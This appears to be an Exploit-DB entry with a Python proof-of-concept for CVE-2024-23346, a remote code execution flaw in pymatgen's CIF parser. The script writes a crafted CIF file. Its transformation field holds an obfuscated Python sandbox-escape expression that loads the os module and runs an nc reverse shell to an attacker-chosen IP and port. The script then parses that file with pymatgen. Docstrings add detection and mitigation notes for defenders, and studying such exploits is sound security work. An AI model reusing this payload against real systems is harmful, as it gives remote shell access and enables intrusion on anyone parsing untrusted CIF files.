Pymatgen 2024.1 - Remote Code Execution (RCE)

EDB-ID:

52205




Platform:

Python

Date:

2025-04-15


# Exploit Title : Pymatgen 2024.1 - Remote Code Execution (RCE)
# Google Dork : (not applicable)
# Date : 2024-11-13
# Exploit Author : Mohammed Idrees Banyamer
# Vendor Homepage : https://pymatgen.org
# Software Link : https://pypi.org/project/pymatgen/
# Version : 2024.1
# Tested on : Kali Linux 2024.1
# CVE : CVE-2024-23346


import os

# Build the CVE-2024-23346 proof-of-concept CIF file and write it to disk
def create_malicious_cif(ip, port):
    """Write ``vuln.cif``, a CIF file whose transformation field holds a Python expression.

    Args:
        ip: Value substituted into the ``nc`` command inside the payload.
        port: Value substituted into the same command.

    Returns:
        None. The file is written to ``vuln.cif`` in the current working
        directory, replacing any existing file of that name.

    Both arguments are interpolated into the file text as given; nothing in
    this function validates or quotes them before they become part of the
    string passed to ``os.system``.

    Review notes for defenders:
        * Every line of the file is ordinary CIF metadata except the value of
          ``_space_group_magn.transform_BNS_Pp_abc``. That value keeps the
          ``x,y,z;0,0,0`` outline of a transformation string but replaces the
          third axis term with a list comprehension ending in a function call.
        * NOTE(review): the advisory for CVE-2024-23346 attributes the issue
          to ``eval()`` being applied to this string in
          ``JonesFaithfulTransformation.from_transformation_str()``; that code
          is not visible in this file, so confirm against the pymatgen source.
        * Detection: a transformation value containing square brackets,
          parentheses, quotes or double-underscore names is not a plain
          transformation string and can be flagged before the file is parsed.
          Matching on the literal ``__subclasses__`` is not sufficient, because
          the payload assembles that name from two string pieces.
        * Mitigation: parse CIF files from untrusted sources only with a
          pymatgen release that contains the fix for CVE-2024-23346, and treat
          CIF uploads as untrusted input that can reach an interpreter.
    """
    # f-string template: {ip} and {port} land inside the os.system() argument.
    # The expression needs no import statement: it goes from a tuple's class
    # to `object` via __mro__[1], lists object's subclasses, selects the one
    # named BuiltinImporter, and uses it to load the `os` module.
    malicious_cif = f"""
data_5yOhtAoR
_audit_creation_date            2024-11-13
_audit_creation_method          "CVE-2024-23346 Pymatgen CIF Parser Reverse Shell Exploit"

loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("nc {ip} {port} -e /bin/bash");0,0,0'

_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "
    """
    
    # Write the text to a fixed relative path; the driver below reads the
    # same name back.
    with open("vuln.cif", "w") as file:
        file.write(malicious_cif)
    print("[*] Malicious CIF file created: vuln.cif")

# Driver: collect the listener address, write vuln.cif, then parse it locally
def exploit():
    """Prompt for a listener address, generate ``vuln.cif`` and parse it with pymatgen.

    The file is parsed inside this same process, so whatever the crafted
    field causes the parser to execute runs on the machine executing this
    script. It therefore demonstrates the parser's behaviour on a crafted
    file; in a deployment the exposure is any service or workflow that parses
    CIF files supplied by someone else.

    Returns:
        None. The parsed result is bound to a local name and not used.
    """
    listener_host = input("Enter your IP address for the reverse shell: ")
    listener_port = input("Enter the port for the reverse shell to listen on: ")

    # Both answers are passed through unchanged and embedded in the CIF text.
    create_malicious_cif(listener_host, listener_port)

    # Imported here rather than at module level, so a missing pymatgen
    # install surfaces only after the file has been written.
    from pymatgen.io.cif import CifParser

    # NOTE(review): the crafted field is presumably evaluated during
    # parse_structures() rather than in the constructor; confirm against the
    # installed pymatgen version.
    parsed_structures = CifParser("vuln.cif").parse_structures()

# Entry point: run the proof of concept only when this file is executed as a
# script, so importing the module does nothing beyond defining its functions.
if __name__ == "__main__":
    exploit()